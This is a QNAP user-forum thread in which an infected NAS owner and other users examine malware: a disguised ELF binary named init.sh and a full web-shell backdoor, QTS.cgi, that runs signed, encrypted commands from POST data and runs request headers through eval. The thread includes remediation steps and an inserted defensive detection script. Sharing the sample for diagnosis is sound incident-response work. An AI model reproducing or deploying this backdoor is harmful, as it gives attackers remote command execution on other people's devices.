Virus on my QNAP?
- dolbyman
- Guru
- Posts: 35273
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Virus on my QNAP?
post in codewraps or attach to forum, hard to judge without info
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
@Dolbyman:
I don't know how to attach the file to this post, therefore the information I can provide:
- I refer to the following file:
Code: Select all
[/etc/config] # ls -le init.sh
-rwxr-xr-x 1 admin administ 2736 Wed Nov 26 16:32:47 2014 init.sh*
- I own a TS-459 Pro with the latest firmware (updated today).
- As I cannot attach the actual file, I hereby include a part (first part) of the file:
Code: Select all
[/etc/config] # more init.sh
ELFT744 (77?
--More-- (88% of 2736 bytes)
- OneCD
- Guru
- Posts: 12146
- Joined: Sun Aug 21, 2016 10:48 am
- Location: "... there, behind that sofa!"
Re: Virus on my QNAP?
Well, it starts with ELF so it's a binary executable. Wouldn't recommend running it though.
Try showing the text strings:
Code: Select all
strings /etc/config/init.sh
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Output from the proposed command:
Code: Select all
[/etc/config] # strings /etc/config/init.sh
UWVS
[^_]
SVW1
_^[]
[^_]
[^_]
[^_]
[^_]
PPWj
PPWj
QQWj
PPWj
SSWj
ZYWj
[^_]
[^_]
WVSQ
Hu6F
Y[^_]
jC@}x
}PzdH
/usr/bin/sh
/bin/ash
- OneCD
- Guru
- Posts: 12146
- Joined: Sun Aug 21, 2016 10:48 am
- Location: "... there, behind that sofa!"
-
- Experience counts
- Posts: 2415
- Joined: Wed Jan 08, 2014 10:34 pm
Re: Virus on my QNAP?
That's certainly going to be malicious. Quite likely the malware foothold.
My only worry (for now) is the init.sh file in /etc/config. If someone knows if this can be deleted as it contains no normal script commands....
Drop a copy on to virustotal.com and see if it's recognised malware.
TS-431+ for storage and media and a bunch of IP cams under Surveillance Station. TVS-473 as files backup and QVR Pro.
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Hi @Alastair-Stevenson,
I dropped the file at virustotal.com.
Herewith the results:
Code: Select all
0 / 57
No engines detected this file
SHA-256 f12393982971024695b32caecdf16f4c96fe68a765949727f6a1b84e2eecbb6d
File name init.sh
File size 2.67 KB
Last analysis 2015-06-04 10:31:24 UTC
Details:
Code: Select all
Basic Properties
MD5 59b6fdd280fe35f41f77065d3d8a69bf
SHA-1 774b1fd8d6050fa2f7661060bac1a88acc3a6fce
File Type ELF
Magic ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
SSDeep 48:fQdCFNsQhYEqlhGgP66RaCHhOA5Nmh6rYIBCYwZX6MODXOB:fEC3sQRqlhGcRzpnOOpBC9X6PD+B
TRiD ELF Executable and Linkable format (generic) (100%)
File Size 2.67 KB
Tags
elf
History
First Submission 2015-06-04 10:31:24
Last Submission 2015-06-04 10:31:24
Last Analysis 2015-06-04 10:31:24
File Names
init.sh
ELF Info
Header
Class ELF32
Data 2's complement, little endian
Header Version 1 (current)
OS ABI UNIX - System V
ABI Version 0
Object File Type EXEC (Executable file)
Required Architecture Intel 80386
Object File Version 0x1
Program Headers 1
Section Headers 0
Contained Segments
LOAD
ExifTool File Metadata
CPUArchitecture 32 bit
CPUByteOrder Little endian
CPUType i386
FileType ELF executable
MIMEType application/octet-stream
ObjectFileType Executable file
I have restarted the NAS today and determined the last time this file has been accessed (using ls -lu). After the reboot the file wasn't accessed. So it might be that the malware -in the directory of autorun.sh (so not on the disks but on the NAS itself)- is the trigger to start this 'malware?'-executable. I will frequently look at the file if it has been accessed and check all other changes which indicate the malware might still be there.
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Malware is still there.
After a reboot it creates at least a file in /home/httpd/cgi-bin/qid named QTS.cgi
I have added the content of this file below (malware remover deletes this file but not the creator..)
Does anyone know what it does (my knowledge of Linux script is too limited)???
Code: Select all
[/home/httpd/cgi-bin/qid] # more QTS.cgi
#!/bin/sh
genrstr ()
{
local s=;
local min=${1:-4};
local max=${2:-12};
local kspace="${3:-a-zA-Z}"
tr -dc "$kspace" < /dev/urandom | {
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
echo "$s"
}
}
command -v mktemp > /dev/null 2>&1 || mktemp () {
local suffix=`genrstr 6 6`
test "$2" && { mkdir "${2%XXXXXX}$suffix"; echo "${2%XXXXXX}$suffix"; } || { touch "${1%XXXXXX}$suffix"; echo "${1%%XXXXXX}$suffix"; }
}
exec 2>/dev/null
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
test ! -z "${QUERY_STRING}" || { printf "Date: "; TZ=UTC date; exit 0; }
echo "Date: Fri Nov 18 22:06:14 GMT 2016"
cr=`printf '\r' || echo -ne '\r'`
test "${#cr}" -eq 1 && echo "$cr" || echo ""
test "x$HTTP_REFERER" = "x41f8047417288c333cd56c0b26a3db0d00f0c90e" || exit 0
test ! -z "${0}" && test `ps aux | grep "${0}" | wc -l` -gt 40 && exit 0
command -v openssl >/dev/null 2>&1 && {
POSTDATA=''
k="1PfFPWcCBz6LlhdAgRf4oZPNe3IvNQ6U"
test "x${REQUEST_METHOD}" = xPOST && test ! -z "${QUERY_STRING}" && case "${QUERY_STRING}" in '' | *[!0-9]* | 0* ) false ;; [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9] ) d="$(( `date +%s` / 100 ))"; test "${QUERY_STRING}" = "${d}" && ct="$d" || { test "${QUERY_STRING}" = "$(( $d - 1))" && ct="$(( $d - 1 ))"; } ;; *) false ;; esac && test ! -z "${QUERY_STRING}" && {
nl='
'
case "${CONTENT_LENGTH}" in '' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` || exit 0
s="${POSTDATA##*.}"
st="${s##*-}"
s="${s%%-*}"
d="$(( $d / 1000 ))"
test ! -z "$d" && test ! -z "$st" && test "${#st}" = 5 && { test "x$st" = "x$d" || test "x$st" = "x$(( $d - 1 ))"; } || { test -f "$t" && rm "$t"; exit 0; }
case "$s" in '' | *[!a-zA-Z0-9/+=$nl]* ) test -f "$t" && rm "$t"; exit 0; ;; esac
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAyiG+H/1fcLMfTNUvvBes
OJq06fOGmBFKIUOCPsyGpAuzDrCKlnBuHoL4hSEtnuxTBNt8jABzdZ+p9qUbAZ3O
zaPmJIds1gHHl1KF+Q8H5bNdNs9MCRkEvCUgJGFe3AalL7k+j/RXBsWrsLCKdGKW
aH+dtC0NdLKdkzhK8qBqzHxC+MUGzee5//OgDKdcKeelaCgzUJa0ui11BZ3IjKpQ
l7HokVHmyzRrJGPcuc4klH9bK4SeADehRyjylivHQcqSK1sNswapJm2qDjyQ7hjR
R2saOzubTUw1+2QKl+My5Sfyo/B8NopNY6EAOL8YCPVHCapq2af2ZythaV22VpfY
ztzjEy5OkFNh6fRgZNpbsuMu4nPaB/rgvJmsWx93ansh4IeXiPyOuKVBamUZyIvL
xr2ESC2rhgWhqgJuiLlHG+HMK63PodBMFyKq9rLd4h99nXb9+iCmFQ9fzJKs9SSM
j7xadGpabK2aNTpN3zDAuEGI4ZOtqxLqWjEHm0bE+Z5FAgMBAAE=
-----END PUBLIC KEY-----
EOF
test ! -z "$s" && h=`openssl base64 -d <<EOF | openssl rsautl -pubin -inkey "$t" -verify
$s
EOF
` || { test -f "$t" && rm "$t"; exit 0; }
test -f "$t" && rm "$t"
m="${POSTDATA%%.*}"
POSTDATA=''
case "$m" in '' | *[!a-zA-Z0-9/+=$nl]* ) exit 0 ;; esac
k=`openssl dgst -sha1 -binary -hmac "$ct" <<EOF | openssl base64
$k
EOF
`
m=`openssl enc -d -aes-256-cbc -k "$k" -md sha1 -salt -a <<EOF
$m
EOF
`
mh=`openssl dgst -sha1 -binary -hmac "$st" <<EOF | openssl base64
$m
EOF
`
test ! -z "$h" && test "$h" = "$mh" || exit 0
eval "$m"
true
} || {
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----
-----END PUBLIC KEY-----
EOF
openssl rsautl -pubin -inkey "$t" -encrypt <<EOF | openssl base64
$k
EOF
rm "$t"
true
}; true; } || {
test "x$ACCEPT_LANGUAGE" = "x11238f2b4a7c2089afd1301374a658cfa8562ec6" && eval "$HTTP_USER_AGENT"
}
test -f "$t" && rm "$t"
sleep 1
exit 0
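The checks below are an added example, not part of any forum post: a POSIX shell triage script built from two traits visible in this thread, a `.sh` file that is really an ELF binary (init.sh) and a CGI script showing the `eval`, fixed-token and embedded-public-key patterns of the posted QTS.cgi. The function names, the score threshold of 2 and the sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): triage checks built from traits of the
# posted init.sh and QTS.cgi. Names, threshold and sample files are constructed.

# is_elf FILE: succeeds if FILE starts with the ELF magic bytes 7f 45 4c 46.
is_elf() {
    [ -f "$1" ] || return 1
    magic=$(dd if="$1" bs=1 count=4 2>/dev/null | od -An -tx1 | tr -d ' \n')
    [ "$magic" = "7f454c46" ]
}

# cgi_backdoor_score FILE: prints how many of three QTS.cgi traits FILE shows.
cgi_backdoor_score() {
    score=0
    # Trait 1: eval of a request header or of a decrypted variable named m.
    if grep -Eq 'eval[[:space:]]+"\$(HTTP_[A-Z_]+|m)"' "$1"; then score=$((score + 1)); fi
    # Trait 2: a request variable compared with a fixed 40-hex-digit token.
    if grep -Eq '\$[A-Z_]+"[[:space:]]*=[[:space:]]*"x?[0-9a-f]{40}"' "$1"; then score=$((score + 1)); fi
    # Trait 3: an embedded public key used with "openssl rsautl ... -verify".
    if grep -q -e '-----BEGIN PUBLIC KEY-----' "$1" &&
       grep -Eq 'openssl rsautl .*-verify' "$1"; then score=$((score + 1)); fi
    echo "$score"
}

# scan_tree DIR: prints one finding per line for *.sh and *.cgi files under DIR.
scan_tree() {
    find "$1" -type f \( -name '*.sh' -o -name '*.cgi' \) 2>/dev/null | sort |
    while IFS= read -r f; do
        case "$f" in
            *.sh)  if is_elf "$f"; then echo "ELF-AS-SCRIPT $f"; fi ;;
            *.cgi) s=$(cgi_backdoor_score "$f")
                   if [ "$s" -ge 2 ]; then echo "CGI-BACKDOOR score=$s $f"; fi ;;
        esac
    done
}

# make_sample_tree: builds a constructed test tree and prints its path.
make_sample_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/config" "$d/cgi-bin/qid"
    printf '\177ELF\001\001\001' > "$d/config/init.sh"        # binary under a .sh name
    printf '#!/bin/sh\necho hello\n' > "$d/config/autorun.sh" # ordinary text script
    printf '#!/bin/sh\necho "Content-type: text/plain"\n' > "$d/cgi-bin/ok.cgi"
    cat > "$d/cgi-bin/qid/QTS.cgi" <<'EOF'
#!/bin/sh
test "x$HTTP_REFERER" = "x0123456789abcdef0123456789abcdef01234567" || exit 0
-----BEGIN PUBLIC KEY-----
h=`openssl rsautl -pubin -inkey "$t" -verify`
eval "$m"
EOF
    echo "$d"
}

# Stand-alone use: scan the given directories, or the constructed sample tree.
if [ $# -gt 0 ]; then
    for dir in "$@"; do scan_tree "$dir"; done
else
    dir=$(make_sample_tree) && scan_tree "$dir"; rm -rf "$dir"
fi
```

Pass directories such as /etc/config and /home/httpd/cgi-bin as arguments; a finding is a lead for manual review of that file, not proof of infection.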
- dolbyman
- Guru
- Posts: 35273
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Virus on my QNAP?
contact qnap for assistance
- Trexx
- Ask me anything
- Posts: 5388
- Joined: Sat Oct 01, 2011 7:50 am
- Location: Minnesota
Re: Virus on my QNAP?
I would say nothing good by the little bit of it I understand. I would make sure your router is set to block all QNAP incoming ports, make sure UPnP & probably for the time being myqnapcloud is disabled etc.
If you are running the latest QTS version, look in Control Panel / Hardware / and uncheck run user defined processes. You should also click the View Autorun.sh link to see if anything is listed there.
Paul
Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350
Model:TVS-673 32GB & TS-228a Offline
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
- dolbyman
- Guru
- Posts: 35273
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Virus on my QNAP?
viewtopic.php?f=50&t=136085#p641687
Trexx wrote: You should also click the View Autorun.sh link to see if anything is listed there.
autorun.sh is apparently infected, with encrypted commands (?!?!)
- Trexx
- Ask me anything
- Posts: 5388
- Joined: Sat Oct 01, 2011 7:50 am
- Location: Minnesota
Re: Virus on my QNAP?
Why I recommended UNCHECKING run it
dolbyman wrote: viewtopic.php?f=50&t=136085#p641687
Trexx wrote: You should also click the View Autorun.sh link to see if anything is listed there.
autorun.sh is apparently infected, with encrypted commands (?!?!)
Paul
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Thanks @Trexx and @dolbyman,
There is no option to run user defined processes (probably because the highest version for 459Pro is 4.2.6 and not a 4.3.* version).
I have blocked all ports in my router and disabled the NAS from configuring my router.
I will contact QNAP for assistance.
Just to review my findings and actions taken (not in actual sequence):
- Removed all infected *.cgi files from /home/httpd/cgi-bin (and its subdirectories)
- Removed the malware entry in crontab
- Removed hidden .RMM... directory (I believe it was /share/MD0_DATA/.qpkg)
- Removed all additions in script files of installed packages (as added after first line in the file .. )
- Removed autorun.sh and a malware executable from the startup directory (sdx6 device I believe)
- Restarted the NAS several times
- Installed latest firmware
- Changed all passwords for users
- Removed all non essential packages
- Installed latest Malware remover
- Keeping an eye on init.sh (still don't know if it can be deleted)
- Changed the names of the following files (as I don't trust them)
Code: Select all
-rw-r--r-- 1 admin administ 193 Sep 13 03:52 FVsSlowcXu
-rw-r--r-- 1 admin administ 393 Sep 13 03:52 NihLqRdqovnhIHi
-rw-r--r-- 1 admin administ 1679 Sep 13 03:52 gilgagrq
- Just noticed a user [sshd] (yes, including square brackets) is added to the passwd file... don't know if this is normal .. I don't know if this is also part of the malware .. potentially enabling access via sshd/ssh to QNAP systems??
Will keep you informed if I make any progress. If anyone has any brilliant thoughts, please share them.
-
- Starting out
- Posts: 13
- Joined: Tue Apr 20, 2010 12:16 am
Re: Virus on my QNAP?
Ticket to QNAP submitted.
-
- Starting out
- Posts: 23
- Joined: Wed Oct 15, 2014 12:00 am
Re: Virus on my QNAP?
Anyone else getting these messages?
Running AVG on my laptop I am prevented from accessing my QNAP TS412 and am getting following messages:
"aborted connection on qnapcloud.... because it was infected with Win32:Malware-gen"
ditto but with "JS:Redirector-BWW"
I've checked that the NAS is up to date with virus database and has recently scanned with no reported issues. Is this for real and if so, why is the NAS antivirus not picking it up? Should I/can I run Spybot S&D on the NAS?
Advice appreciated!
QNAP TS412